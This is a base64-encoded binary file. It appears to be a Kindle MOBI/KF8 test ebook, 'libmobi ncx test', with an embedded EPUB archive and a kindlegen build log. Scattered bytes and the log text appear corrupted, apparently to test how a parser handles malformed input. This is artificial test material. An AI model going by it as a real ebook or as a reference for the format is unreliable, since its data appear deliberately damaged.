AFYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA6wAAAAAAAAAAAAAAxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAArgAAAAAA0wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABXAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAACRAAAAAAAAAAAAAAAAADYAAAAAyQAAAJ4AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAPwAAACCAAAAAAAAAAAAAAAAAAAAAADJAAAAAAAAAAAAAAAACwAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJcAAAAAzAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEAAAAAAAAAAAAAAAAA AAAAUQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJ0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AMEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACxAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADd QwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHQAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAlwAAAABPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAA6gAA0QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYQAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACHAAAAx3MAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAHwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWAAAAAAAAAAAAAAAAAAAAABM6AAAAAAAAAAA AAAAAAAAAAAAALgAAAAAAAAAAAAAAAAAAGwAAAAAAACjAAAAAAAAAAAAAAAAAAAAAADVAAAAAAAA AAAAAAAAAAAAAAUAAAAAAAAAAAAAAACWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADwAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC9AAAAAGkAAAAAAAAAAAAAAAAAAAAAAAAAAABd AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAADkAABYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEYAAAAAAAAAaAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHkAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAD3AAAAAAAAADIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAL8AAAAA AAAAAGsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACOAAAAAAAAAAAA AAAAAAAcAAAAAAAAAAAAAAAAhAAAAAAAAAAAAAAAkgAAAAAAAAAAAAAA3wAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANkAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAPkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAADEAAAAAAAAAAKYAAAAAAAAAAAAAAAAAAADc AAAAAAAAAAAAAAAAAAAAAFkAAAAAAAAAAAAAXQAAAAAAAAAAAAAAAAAA3gAAAAAAAAAAAAAAAAAA AAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAIIAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAACqAIcAAAAAoAAAAAAAAAAAAAAAAAAAAAAAzQAAAAAAAABUAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALwAAAAC5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALUA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACl AABMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADrAAAAAAAAAAAAAADE AACXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AHoAAAAAAAAAAAAAABgAAAAAAAAAZgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA1AAA+wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 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 LjkKTWhjCjAKSW5mbyhwcmNnZW4pOkkxMDQ3OiBBZCJlZCBtZXRhZGF0YSBkYzpUaXRsZSAgICAg ICAgImxpYm1vYmkgbmN4IHRlc3TQDQoKSW5MbyhwcmNnZW4pOkkxMDQ3OiBBZGRlZCBtZXRhZGF0 YSBkYzpEYXRlICAgICAgICAgIjIwMTgtMDg4MDciDQoKSW5mbyhwcmNnZW4pOkkxMDAyOiAXYXJz aW5nIGZpbGVzICAwMDAwMDAzDQoKSW5mbyhwcmNnZW4pOkkxMDE1OiBCdWlsZGluZyBQUkMgZmls ZQ0KCkluZm8ocHJjZ2VuKTpJMTAwNjogUmVzb2l2aW5nIGh5cGVybGlua3MNCgpJbmZvKHAMY2dl bq06STEwNDk6IEJ1aWxkaW5nIHRhYmxlIG9mIGNvbnRlbnQgICAgIFVS7TogdG9jLm5jeA0KCldh cm5pbmcocHJjZwduKTpXMTQwMTY6IENvdmVyIG5vdCBzcGVjaWZpZWQNCgpJbmZvKHBhZ2VtYXAp Okk4MDAwOiBObyBQYWdlIG1hcCBmb3VuZCBpbiB0aGUgYm9vaw0KCkluZm8oeXJjZ2VuKTpJMTA0 NTogQ29tcHV0aW5nIFVOSUNPREUgcmFuZ2VzIHVzZWQgaW4gdGhlIGLWb2sNCgpJuGZvKHDkY2dl bsw6qjEwNDY6IEZvdW5kIFVOSUNPREUgcmFuZ2U6IEJhc2ljIExhdHFuIFsyMC4uN0VdDQoKSW5m byhwcmNnZW4pOkkxMDE3OiBCdWlsZGluZxVQUsAgZmlsZSwgcmVjb3JkIGNvda90OiAgIDAwMDAw MDGpCgpJbmZvKHByY2dlbik6STEwMzk6IEZpbmFsIHN0YXRzIC14dGV4dCBjb3twcmVzc2VkIHRv IChpbiAlIG9mIG9yaWdpbmFsIHNpemUpOiAgNDguN+ElDQoKSW5mbyhwcmNnZW4pOkkxMDQwOiBU T2UgZG9jdW1lbnQgaWRlbnRpZmllciBpczogImxpYm1vYmlfbmd4X3Rlc3QiDQoKSW5mbyhwcmNn ZW4pOrFhMDQxOiBUaGUgZmlsZSBmb3JtYXQgdmVyc7JvbiBpc9pWNg0KCkluZm8ocHJjZ2VuKTpJ MTAzMTogU2F2aW5nIFBSQyBmaWxlDQoKSW5mbyhwcmNnZW4pOkkxMDMzOiBQUkMgYnVpbHQgd2l0 aCBXQVJOSU5HUyENCgpJbmZvKHByY2dlbik6STEwMTY6IEJ1aWxkaW5nIGVuaGFuY2VkIFBSQyBm aWxlDQoKSW5mbyhwcmNnZW4pOkkxMDA3OiBSZXNvbHZkbmcgbWUVaWFpZGxpbmtzDQoKSW5mbyhw cmNnZW4pOhUxMDExOiDIcml0aW5nIW1lZGlhaWRsaW5rcw0KCkluZm8ocHJjZ2VuKTpJMTAwOTog UmVzb2x2aW5nIGd1aWRlIGl0ZW1zDQoKSW5mbyhwcmNnZW4pOkkxMDM5OiBGaW5hbCBzdGF0cyAt IHRlz3SDY29tcHJlc3PDZCB0byAoaW4gJSBvZiBvcmlnaW5hbCBzaXplKTooIDQwLjYw5A0KCklu Zm8ocHJjZ3xuKTrQMTA0UDogVGhlIGZpbGUgZm9yyGF0nHZlcnNpb24gaXMgVjgNCgpJbmZvKHBy Y2dlbik6STEwMzI6IMFSQyBidWpsdCBzdWNjZXNzfYxsbHkNCgpJbmZvKHByY2dlFyk6STE1MDAw 6CAgQXBwcm94aQ5hdGUgU3RhbmNhcmQgTW9iaSBEZWxpdmVyYWJsZSBmaWxlIHNpessgOiAgIDAw MDAwMTNLQg0KCkluZm8ocHJjZ2VuKTpJMTUwMDE6ICBBcHByb3hpcWF0ZSBLRjggRGVsaXZlcmFi bGUgZmlsZSBzaXplIDogJyAwMDAwMDE0S0INCgoA/kJPVU5EQVJZAAIAAAAABAgAARAAAAAAAE1P QkkAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAcAAAAC/////////////////////////////////+v/ //////8AAAACAJoCTAAAABAAAAAJAAAAAAAAAAAAAAAIAAAACgAAAKoAAAAAAAAAAAAAAAAAAABQ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//+j//////wAAAAAAAAB9AAARAAAAAAAA AF8YAAEATgAAAAEAAAAL8AAAAQAAAAoAAAABAAAAAAAAAAD/lf//AAAAAP//////////WAAAAwAA AAcAAAACAAAABQAAAAz//////////6YAAAD/////AAAAAEVYVEgAAAD8AAAADgAAAGoAAAASMjAx OC0BOC0wNwAAAh4AAAAMSG8weAAAAgwAAAAKZW44AAINAAAAFWhvcml6b250YWwtbHIAAACKAAAA GWtpbmRsZTplbWJlZDowMDAxAAAAgwAAAAwAAAAAAAABLAAAACwBAAAAAAAAAAAAAAAAAACAAAAA AAAAAAAAAAAAAAAAAPC+Na8AAADMAOoADAAAAMoAAADNAAAADAAAAAIAAADOAAAADAAAAAmZAAIX AAAAFDEwlzgtMDg5NzI5MgAAAM8AAAAMAAAAAAAAAiMAAAAQSW7eZW1vcnkAAAB9AAAADAAAAG8A AGxpYm1vYmkgbmN4IHRlc3QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADRgAAAAAAAAAxgAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIUAAAAAAAAAAAAAAAAAAACZAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArQAAAP4A AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAArAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA2hQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkQAAAAAAqgAAAAAAAAAAAAAAAAAAAAAHAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAfgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAADJLdsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAALAAAAAAAAAAAAAAAADKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAZgAAAAAAMwAAAAAAUwAAABMAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AADaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAC0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIkAAAAA AAAAAAB5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEoAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMIA AAAAAAAAAAAAAgAAAAAAAAAAAJ0AAEsAAAAAAAAAAAAAAAAAAAAAAFoAAAAAAAAAJQAAAAAAAAAA AAAAAAAAAADLAAAAAAAAAACrAAAAAAAAAAAAAAAAAADHAAAAAAAAAABmAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAANoAkgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD7AAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAuQAAAAAAAAsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAAAAAAAAAAAKAAA AHAAAAAAAAAAAAAAAAAAAAAAAAAAAAC/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACEAAAAAAAAA AAAAAAAAAAAAAAAA7QAAADEAAAAAAAAAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAMoAAAAAAAAAAAAAAAAAAAAAAAAAAIIAAOQAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAED9AAAAAAAAAAAAAAAAAP/zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB6AAAAAAAAAAAAmAAAAAAAADMAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABsAAAAAAAAAAAA AAAAAAAAAAAA4AAAAAAAAAAAAAAAAAAAAIsAAAAAAAAAAABnAAAAAAAAAAAAAAAAAAAAAAAAAIYA AAAAAAAAAAAAAAAAAAAAAAAAAACzAAAAAFgAAAAAAAAAfgAAAAAAAAAAAADoAAAAAAAAAAAAAAAA tQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADwAAAAAAA8AAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCAAAAAAAA AAAAAAAAANIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdgAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAAAAAAAAAAAAbwAAAACTAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAACwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAD7AAAAAAAAAAAAAAAAAADfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AFkAAAAAAAAAAAAAAAAAAP8AAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAOQAAAAA1AAAAAAAAAAAAAAAA9QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAO0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA5QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIwAAAAAAAAAAABgAAAAAAGAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAAAAAAAAAAAEsAAAAAAAAA AAAAAAAAAwAArQAAAAC/AAAAAAAAAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAABsAAAAAAAAAAAA AAAAAAAAAAAAAAAAADObAAAAAAAAAADJAAAAAAAASwAAAAAAAAAAAAAAAAAAAAAAAMkAAAAAAAAA AAAAAAAAAAAAAAAAAAAAvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAADjAACnAMQAAAAAAAAAAAAAAAAAAAAAAAAA1wAAAAAAAAAAAABjAAAAAAAAAACMAAAA AOMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAABjAAAAAAAAAAAAAAAAAAAAAAAAAAAANQAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAEAACcAAAAAAAAAAAAAAAD7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABsAAAAAAAAAAAAAAAAAAAA AAAAAEYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHYAAAAAAAAA AAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxQAA1AAAAN0AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAPsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAA AAAAAAAAAAAAAAAAAAAAAAAAeAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 